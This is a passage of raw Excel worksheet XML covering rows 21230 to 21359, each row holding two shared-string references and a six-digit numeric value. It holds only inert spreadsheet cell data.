        <v>17437</v>
      </c>
      <c r="C21230" s="15">
        <v>801490</v>
      </c>
    </row>
    <row r="21231" spans="1:3">
      <c r="A21231" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21231" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21231" s="15">
        <v>801550</v>
      </c>
    </row>
    <row r="21232" spans="1:3">
      <c r="A21232" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21232" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21232" s="15">
        <v>801555</v>
      </c>
    </row>
    <row r="21233" spans="1:3">
      <c r="A21233" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21233" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21233" s="15">
        <v>801560</v>
      </c>
    </row>
    <row r="21234" spans="1:3">
      <c r="A21234" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21234" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21234" s="15">
        <v>801570</v>
      </c>
    </row>
    <row r="21235" spans="1:3">
      <c r="A21235" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21235" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21235" s="15">
        <v>801580</v>
      </c>
    </row>
    <row r="21236" spans="1:3">
      <c r="A21236" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21236" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21236" s="15">
        <v>801590</v>
      </c>
    </row>
    <row r="21237" spans="1:3">
      <c r="A21237" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21237" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21237" s="15">
        <v>801626</v>
      </c>
    </row>
    <row r="21238" spans="1:3">
      <c r="A21238" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21238" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21238" s="15">
        <v>801645</v>
      </c>
    </row>
    <row r="21239" spans="1:3">
      <c r="A21239" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21239" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21239" s="15">
        <v>801660</v>
      </c>
    </row>
    <row r="21240" spans="1:3">
      <c r="A21240" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21240" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21240" s="15">
        <v>801667</v>
      </c>
    </row>
    <row r="21241" spans="1:3">
      <c r="A21241" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21241" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21241" s="15">
        <v>801670</v>
      </c>
    </row>
    <row r="21242" spans="1:3">
      <c r="A21242" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21242" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21242" s="15">
        <v>801674</v>
      </c>
    </row>
    <row r="21243" spans="1:3">
      <c r="A21243" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21243" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21243" s="15">
        <v>801755</v>
      </c>
    </row>
    <row r="21244" spans="1:3">
      <c r="A21244" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21244" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21244" s="15">
        <v>801845</v>
      </c>
    </row>
    <row r="21245" spans="1:3">
      <c r="A21245" s="28" t="s">
        <v>26936</v>
      </c>
      <c r="B21245" s="14" t="s">
        <v>17437</v>
      </c>
      <c r="C21245" s="15">
        <v>801867</v>
      </c>
    </row>
    <row r="21246" spans="1:3">
      <c r="A21246" s="28" t="s">
        <v>26937</v>
      </c>
      <c r="B21246" s="14" t="s">
        <v>17438</v>
      </c>
      <c r="C21246" s="15">
        <v>802055</v>
      </c>
    </row>
    <row r="21247" spans="1:3">
      <c r="A21247" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21247" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21247" s="15">
        <v>803290</v>
      </c>
    </row>
    <row r="21248" spans="1:3">
      <c r="A21248" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21248" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21248" s="15">
        <v>803460</v>
      </c>
    </row>
    <row r="21249" spans="1:3">
      <c r="A21249" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21249" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21249" s="15">
        <v>803480</v>
      </c>
    </row>
    <row r="21250" spans="1:3">
      <c r="A21250" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21250" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21250" s="15">
        <v>803490</v>
      </c>
    </row>
    <row r="21251" spans="1:3">
      <c r="A21251" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21251" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21251" s="15">
        <v>803545</v>
      </c>
    </row>
    <row r="21252" spans="1:3">
      <c r="A21252" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21252" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21252" s="15">
        <v>803550</v>
      </c>
    </row>
    <row r="21253" spans="1:3">
      <c r="A21253" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21253" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21253" s="15">
        <v>803555</v>
      </c>
    </row>
    <row r="21254" spans="1:3">
      <c r="A21254" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21254" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21254" s="15">
        <v>803560</v>
      </c>
    </row>
    <row r="21255" spans="1:3">
      <c r="A21255" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21255" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21255" s="15">
        <v>803570</v>
      </c>
    </row>
    <row r="21256" spans="1:3">
      <c r="A21256" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21256" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21256" s="15">
        <v>803580</v>
      </c>
    </row>
    <row r="21257" spans="1:3">
      <c r="A21257" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21257" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21257" s="15">
        <v>803590</v>
      </c>
    </row>
    <row r="21258" spans="1:3">
      <c r="A21258" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21258" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21258" s="15">
        <v>803626</v>
      </c>
    </row>
    <row r="21259" spans="1:3">
      <c r="A21259" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21259" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21259" s="15">
        <v>803645</v>
      </c>
    </row>
    <row r="21260" spans="1:3">
      <c r="A21260" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21260" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21260" s="15">
        <v>803660</v>
      </c>
    </row>
    <row r="21261" spans="1:3">
      <c r="A21261" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21261" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21261" s="15">
        <v>803667</v>
      </c>
    </row>
    <row r="21262" spans="1:3">
      <c r="A21262" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21262" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21262" s="15">
        <v>803670</v>
      </c>
    </row>
    <row r="21263" spans="1:3">
      <c r="A21263" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21263" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21263" s="15">
        <v>803674</v>
      </c>
    </row>
    <row r="21264" spans="1:3">
      <c r="A21264" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21264" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21264" s="15">
        <v>803755</v>
      </c>
    </row>
    <row r="21265" spans="1:3">
      <c r="A21265" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21265" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21265" s="15">
        <v>803845</v>
      </c>
    </row>
    <row r="21266" spans="1:3">
      <c r="A21266" s="28" t="s">
        <v>26938</v>
      </c>
      <c r="B21266" s="14" t="s">
        <v>17439</v>
      </c>
      <c r="C21266" s="15">
        <v>803855</v>
      </c>
    </row>
    <row r="21267" spans="1:3">
      <c r="A21267" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21267" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21267" s="15">
        <v>804290</v>
      </c>
    </row>
    <row r="21268" spans="1:3">
      <c r="A21268" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21268" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21268" s="15">
        <v>804480</v>
      </c>
    </row>
    <row r="21269" spans="1:3">
      <c r="A21269" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21269" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21269" s="15">
        <v>804490</v>
      </c>
    </row>
    <row r="21270" spans="1:3">
      <c r="A21270" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21270" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21270" s="15">
        <v>804580</v>
      </c>
    </row>
    <row r="21271" spans="1:3">
      <c r="A21271" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21271" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21271" s="15">
        <v>804590</v>
      </c>
    </row>
    <row r="21272" spans="1:3">
      <c r="A21272" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21272" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21272" s="15">
        <v>804645</v>
      </c>
    </row>
    <row r="21273" spans="1:3">
      <c r="A21273" s="28" t="s">
        <v>21384</v>
      </c>
      <c r="B21273" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21273" s="15">
        <v>804660</v>
      </c>
    </row>
    <row r="21274" spans="1:3">
      <c r="A21274" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21274" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21274" s="15">
        <v>804667</v>
      </c>
    </row>
    <row r="21275" spans="1:3">
      <c r="A21275" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21275" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21275" s="15">
        <v>804670</v>
      </c>
    </row>
    <row r="21276" spans="1:3">
      <c r="A21276" s="28" t="s">
        <v>26939</v>
      </c>
      <c r="B21276" s="14" t="s">
        <v>9830</v>
      </c>
      <c r="C21276" s="15">
        <v>804845</v>
      </c>
    </row>
    <row r="21277" spans="1:3">
      <c r="A21277" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21277" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21277" s="15">
        <v>805290</v>
      </c>
    </row>
    <row r="21278" spans="1:3">
      <c r="A21278" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21278" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21278" s="15">
        <v>805460</v>
      </c>
    </row>
    <row r="21279" spans="1:3">
      <c r="A21279" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21279" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21279" s="15">
        <v>805480</v>
      </c>
    </row>
    <row r="21280" spans="1:3">
      <c r="A21280" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21280" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21280" s="15">
        <v>805490</v>
      </c>
    </row>
    <row r="21281" spans="1:3">
      <c r="A21281" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21281" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21281" s="15">
        <v>805545</v>
      </c>
    </row>
    <row r="21282" spans="1:3">
      <c r="A21282" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21282" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21282" s="15">
        <v>805550</v>
      </c>
    </row>
    <row r="21283" spans="1:3">
      <c r="A21283" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21283" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21283" s="15">
        <v>805555</v>
      </c>
    </row>
    <row r="21284" spans="1:3">
      <c r="A21284" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21284" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21284" s="15">
        <v>805560</v>
      </c>
    </row>
    <row r="21285" spans="1:3">
      <c r="A21285" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21285" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21285" s="15">
        <v>805570</v>
      </c>
    </row>
    <row r="21286" spans="1:3">
      <c r="A21286" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21286" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21286" s="15">
        <v>805580</v>
      </c>
    </row>
    <row r="21287" spans="1:3">
      <c r="A21287" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21287" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21287" s="15">
        <v>805590</v>
      </c>
    </row>
    <row r="21288" spans="1:3">
      <c r="A21288" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21288" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21288" s="15">
        <v>805645</v>
      </c>
    </row>
    <row r="21289" spans="1:3">
      <c r="A21289" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21289" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21289" s="15">
        <v>805660</v>
      </c>
    </row>
    <row r="21290" spans="1:3">
      <c r="A21290" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21290" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21290" s="15">
        <v>805667</v>
      </c>
    </row>
    <row r="21291" spans="1:3">
      <c r="A21291" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21291" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21291" s="15">
        <v>805670</v>
      </c>
    </row>
    <row r="21292" spans="1:3">
      <c r="A21292" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21292" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21292" s="15">
        <v>805674</v>
      </c>
    </row>
    <row r="21293" spans="1:3">
      <c r="A21293" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21293" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21293" s="15">
        <v>805755</v>
      </c>
    </row>
    <row r="21294" spans="1:3">
      <c r="A21294" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21294" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21294" s="15">
        <v>805767</v>
      </c>
    </row>
    <row r="21295" spans="1:3">
      <c r="A21295" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21295" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21295" s="15">
        <v>805845</v>
      </c>
    </row>
    <row r="21296" spans="1:3">
      <c r="A21296" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21296" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21296" s="15">
        <v>805855</v>
      </c>
    </row>
    <row r="21297" spans="1:3">
      <c r="A21297" s="28" t="s">
        <v>26940</v>
      </c>
      <c r="B21297" s="14" t="s">
        <v>17440</v>
      </c>
      <c r="C21297" s="15">
        <v>805867</v>
      </c>
    </row>
    <row r="21298" spans="1:3">
      <c r="A21298" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21298" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21298" s="15">
        <v>807290</v>
      </c>
    </row>
    <row r="21299" spans="1:3">
      <c r="A21299" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21299" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21299" s="15">
        <v>807460</v>
      </c>
    </row>
    <row r="21300" spans="1:3">
      <c r="A21300" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21300" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21300" s="15">
        <v>807480</v>
      </c>
    </row>
    <row r="21301" spans="1:3">
      <c r="A21301" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21301" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21301" s="15">
        <v>807490</v>
      </c>
    </row>
    <row r="21302" spans="1:3">
      <c r="A21302" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21302" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21302" s="15">
        <v>807545</v>
      </c>
    </row>
    <row r="21303" spans="1:3">
      <c r="A21303" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21303" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21303" s="15">
        <v>807550</v>
      </c>
    </row>
    <row r="21304" spans="1:3">
      <c r="A21304" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21304" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21304" s="15">
        <v>807560</v>
      </c>
    </row>
    <row r="21305" spans="1:3">
      <c r="A21305" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21305" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21305" s="15">
        <v>807570</v>
      </c>
    </row>
    <row r="21306" spans="1:3">
      <c r="A21306" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21306" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21306" s="15">
        <v>807580</v>
      </c>
    </row>
    <row r="21307" spans="1:3">
      <c r="A21307" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21307" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21307" s="15">
        <v>807590</v>
      </c>
    </row>
    <row r="21308" spans="1:3">
      <c r="A21308" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21308" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21308" s="15">
        <v>807660</v>
      </c>
    </row>
    <row r="21309" spans="1:3">
      <c r="A21309" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21309" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21309" s="15">
        <v>807667</v>
      </c>
    </row>
    <row r="21310" spans="1:3">
      <c r="A21310" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21310" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21310" s="15">
        <v>807670</v>
      </c>
    </row>
    <row r="21311" spans="1:3">
      <c r="A21311" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21311" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21311" s="15">
        <v>807674</v>
      </c>
    </row>
    <row r="21312" spans="1:3">
      <c r="A21312" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21312" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21312" s="15">
        <v>807755</v>
      </c>
    </row>
    <row r="21313" spans="1:3">
      <c r="A21313" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21313" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21313" s="15">
        <v>807767</v>
      </c>
    </row>
    <row r="21314" spans="1:3">
      <c r="A21314" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21314" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21314" s="15">
        <v>807845</v>
      </c>
    </row>
    <row r="21315" spans="1:3">
      <c r="A21315" s="28" t="s">
        <v>26941</v>
      </c>
      <c r="B21315" s="14" t="s">
        <v>17441</v>
      </c>
      <c r="C21315" s="15">
        <v>807855</v>
      </c>
    </row>
    <row r="21316" spans="1:3">
      <c r="A21316" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21316" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21316" s="15">
        <v>808290</v>
      </c>
    </row>
    <row r="21317" spans="1:3">
      <c r="A21317" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21317" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21317" s="15">
        <v>808460</v>
      </c>
    </row>
    <row r="21318" spans="1:3">
      <c r="A21318" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21318" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21318" s="15">
        <v>808480</v>
      </c>
    </row>
    <row r="21319" spans="1:3">
      <c r="A21319" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21319" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21319" s="15">
        <v>808490</v>
      </c>
    </row>
    <row r="21320" spans="1:3">
      <c r="A21320" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21320" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21320" s="15">
        <v>808545</v>
      </c>
    </row>
    <row r="21321" spans="1:3">
      <c r="A21321" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21321" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21321" s="15">
        <v>808550</v>
      </c>
    </row>
    <row r="21322" spans="1:3">
      <c r="A21322" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21322" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21322" s="15">
        <v>808555</v>
      </c>
    </row>
    <row r="21323" spans="1:3">
      <c r="A21323" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21323" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21323" s="15">
        <v>808560</v>
      </c>
    </row>
    <row r="21324" spans="1:3">
      <c r="A21324" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21324" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21324" s="15">
        <v>808570</v>
      </c>
    </row>
    <row r="21325" spans="1:3">
      <c r="A21325" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21325" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21325" s="15">
        <v>808580</v>
      </c>
    </row>
    <row r="21326" spans="1:3">
      <c r="A21326" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21326" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21326" s="15">
        <v>808590</v>
      </c>
    </row>
    <row r="21327" spans="1:3">
      <c r="A21327" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21327" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21327" s="15">
        <v>808626</v>
      </c>
    </row>
    <row r="21328" spans="1:3">
      <c r="A21328" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21328" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21328" s="15">
        <v>808645</v>
      </c>
    </row>
    <row r="21329" spans="1:3">
      <c r="A21329" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21329" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21329" s="15">
        <v>808660</v>
      </c>
    </row>
    <row r="21330" spans="1:3">
      <c r="A21330" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21330" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21330" s="15">
        <v>808667</v>
      </c>
    </row>
    <row r="21331" spans="1:3">
      <c r="A21331" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21331" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21331" s="15">
        <v>808670</v>
      </c>
    </row>
    <row r="21332" spans="1:3">
      <c r="A21332" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21332" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21332" s="15">
        <v>808755</v>
      </c>
    </row>
    <row r="21333" spans="1:3">
      <c r="A21333" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21333" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21333" s="15">
        <v>808767</v>
      </c>
    </row>
    <row r="21334" spans="1:3">
      <c r="A21334" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21334" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21334" s="15">
        <v>808845</v>
      </c>
    </row>
    <row r="21335" spans="1:3">
      <c r="A21335" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21335" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21335" s="15">
        <v>808855</v>
      </c>
    </row>
    <row r="21336" spans="1:3">
      <c r="A21336" s="28" t="s">
        <v>26942</v>
      </c>
      <c r="B21336" s="14" t="s">
        <v>17442</v>
      </c>
      <c r="C21336" s="15">
        <v>808867</v>
      </c>
    </row>
    <row r="21337" spans="1:3">
      <c r="A21337" s="28" t="s">
        <v>26943</v>
      </c>
      <c r="B21337" s="14" t="s">
        <v>17443</v>
      </c>
      <c r="C21337" s="15">
        <v>810290</v>
      </c>
    </row>
    <row r="21338" spans="1:3">
      <c r="A21338" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21338" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21338" s="15">
        <v>811290</v>
      </c>
    </row>
    <row r="21339" spans="1:3">
      <c r="A21339" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21339" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21339" s="15">
        <v>811460</v>
      </c>
    </row>
    <row r="21340" spans="1:3">
      <c r="A21340" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21340" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21340" s="15">
        <v>811480</v>
      </c>
    </row>
    <row r="21341" spans="1:3">
      <c r="A21341" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21341" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21341" s="15">
        <v>811490</v>
      </c>
    </row>
    <row r="21342" spans="1:3">
      <c r="A21342" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21342" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21342" s="15">
        <v>811545</v>
      </c>
    </row>
    <row r="21343" spans="1:3">
      <c r="A21343" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21343" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21343" s="15">
        <v>811550</v>
      </c>
    </row>
    <row r="21344" spans="1:3">
      <c r="A21344" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21344" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21344" s="15">
        <v>811560</v>
      </c>
    </row>
    <row r="21345" spans="1:3">
      <c r="A21345" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21345" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21345" s="15">
        <v>811570</v>
      </c>
    </row>
    <row r="21346" spans="1:3">
      <c r="A21346" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21346" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21346" s="15">
        <v>811580</v>
      </c>
    </row>
    <row r="21347" spans="1:3">
      <c r="A21347" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21347" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21347" s="15">
        <v>811590</v>
      </c>
    </row>
    <row r="21348" spans="1:3">
      <c r="A21348" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21348" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21348" s="15">
        <v>811626</v>
      </c>
    </row>
    <row r="21349" spans="1:3">
      <c r="A21349" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21349" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21349" s="15">
        <v>811645</v>
      </c>
    </row>
    <row r="21350" spans="1:3">
      <c r="A21350" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21350" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21350" s="15">
        <v>811660</v>
      </c>
    </row>
    <row r="21351" spans="1:3">
      <c r="A21351" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21351" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21351" s="15">
        <v>811667</v>
      </c>
    </row>
    <row r="21352" spans="1:3">
      <c r="A21352" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21352" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21352" s="15">
        <v>811670</v>
      </c>
    </row>
    <row r="21353" spans="1:3">
      <c r="A21353" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21353" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21353" s="15">
        <v>811674</v>
      </c>
    </row>
    <row r="21354" spans="1:3">
      <c r="A21354" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21354" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21354" s="15">
        <v>811755</v>
      </c>
    </row>
    <row r="21355" spans="1:3">
      <c r="A21355" s="28" t="s">
        <v>26944</v>
      </c>
      <c r="B21355" s="14" t="s">
        <v>17444</v>
      </c>
      <c r="C21355" s="15">
        <v>811845</v>
      </c>
    </row>
    <row r="21356" spans="1:3">
      <c r="A21356" s="28" t="s">
        <v>19969</v>
      </c>
      <c r="B21356" s="14" t="s">
        <v>8953</v>
      </c>
      <c r="C21356" s="15">
        <v>812055</v>
      </c>
    </row>
    <row r="21357" spans="1:3">
      <c r="A21357" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21357" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21357" s="15">
        <v>813000</v>
      </c>
    </row>
    <row r="21358" spans="1:3">
      <c r="A21358" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21358" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21358" s="15">
        <v>813290</v>
      </c>
    </row>
    <row r="21359" spans="1:3">
      <c r="A21359" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21359" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21359" s="15">
